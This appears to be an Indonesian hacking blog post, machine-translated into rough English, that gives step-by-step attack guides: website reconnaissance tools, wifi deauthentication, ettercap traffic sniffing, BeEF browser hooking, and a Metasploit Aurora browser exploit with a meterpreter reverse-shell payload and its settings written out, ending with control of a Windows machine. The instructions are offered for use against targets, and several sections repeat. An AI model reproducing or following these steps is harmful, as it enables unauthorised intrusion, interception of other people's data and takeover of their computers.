CRACKING PASSWORD WITH JOHN
information gathering
1. The first method we will use google hacking. look like the picture below.
and see what we can do AMAZING
2. The next way we will use the command linux terminal dr ̈whatweb̈
and see what we can do all the information appears in front of the eyes stay of execution
3. The third way we can get with this ̈joomscan̈ also dr linux terminal
4. The last I discussed using ̈wpscan̈
Senin, 31 Agustus 2015
1. The first method we will use google hacking. look like the picture below.
and see what we can do AMAZING
2. The next way we will use the command linux terminal dr ̈whatweb̈
and see what we can do all the information appears in front of the eyes stay of execution
3. The third way we can get with this ̈joomscan̈ also dr linux terminal
4. The last I discussed using ̈wpscan̈
Senin, 31 Agustus 2015
HACKING WIFI
1. first we do monitoring around us how many wifi in the groove
2. then select the target wifi where we want to collapse password
3. after selected targets we execute the command as in the following picture
4. then open a new terminal and do as shown below
5. after we do the order according to the image above, it will cut off all access to a wifi network that targets us
6. for listening or recording or us as a mediator between wifi and user, we run "ettercap -G" then select snif then select ̈ unifieldsniffing̈
follow the steps as shown God willing you will be able to get all the data about the target when he was browsing.
so first off I want to know the rest? asked google ya ga hacker hahahahahahaha name also will be for all the science guys
2. then select the target wifi where we want to collapse password
3. after selected targets we execute the command as in the following picture
4. then open a new terminal and do as shown below
5. after we do the order according to the image above, it will cut off all access to a wifi network that targets us
6. for listening or recording or us as a mediator between wifi and user, we run "ettercap -G" then select snif then select ̈ unifieldsniffing̈
follow the steps as shown God willing you will be able to get all the data about the target when he was browsing.
so first off I want to know the rest? asked google ya ga hacker hahahahahahaha name also will be for all the science guys
Method combines the use of BEEF and Client side attack
1. Turn on Beef that has been available in Linux,then on the webpage beef insert your login data
3. Open a web that has been inserted script, this is done as if we as a user with access to the web.
4. Having access to the web, the user will be connected to the beef that we run.
5. Select one of the commands that we need are already available.
6. Open a command terminal, run metasploit by typing the consequence of the following:
# msfconsole
7. Locate the module that will be used for exploid made in accordance with the browser in use by the target.
8. Select one of the modules that will be used, here I will use the module aurora,
# Use exploit windows / browser / ms10_002_aurora
9. Setting the server host, server ports, and URIPATH which we will send to the target, are in use with the command:
# Set SRVHOST 192.168.56.1
# Set SRVPORT 8080
# set URIPATH film.mp4
10. Setting payload, LHOST and dns port that we use for us to send it to the target by typing the command:
# Set payload windows / meterpreter / reverse_tcp_dns
# Set LHOST 192.168.56.1
# Set LPORT 53
11. Then run the exploit
12. Copy the url address that is given,copy the address and input to Redirect Browser on Beef, this will force toward the user's browser to a web page that we have prepared.
13. After the user's browser redirect to the url that we insert the payload, then immediately do migrate to an application running on a user's system when the user closes the browser so that we stay connected.
14. Now we have to be in the target's operating system.
SET (Social engenering Toolkit)
SET (Social engenering Toolkit)
This is a tool used to facilitate us when we are too lazy to search manually, then the SET will be very helpful.please see my images below just follow orders and finish what we choose .... very easy not we just enter the command and direct the machine to execute automatically.
This is a tool used to facilitate us when we are too lazy to search manually, then the SET will be very helpful.please see my images below just follow orders and finish what we choose .... very easy not we just enter the command and direct the machine to execute automatically.
Run the Following Command Into The Windows System
1. we open a terminal and enter the command "msfconsole"
2. then use the command "use exploit windows / browser / ms10_002_aurora"
3. The next step we enter the command "set ip SRVHOST us"
4. then we enter the command "set SRVPORT 8080"
5. then we enter the command "set URIPATH file to be sent"
6. After all set then we do set the payload
"Set payload windows / meterpreter / reverse_tcp_dns" then enter
7. done as early filling set LHOST, LPORT, and then run the "exploit"
8. Open a web address that has been created on Windows by using the internet exploer.
9. and you're in
10. Upon entry and then type the command "session -i" and press enter
11. It will appear like the picture below, give the command "-i session (session how that illegible)
12. Now you are in the Windows system as a user, then whatever you want to do anything on the windows that you mastered hahahahahaha










































Tidak ada komentar:
Posting Komentar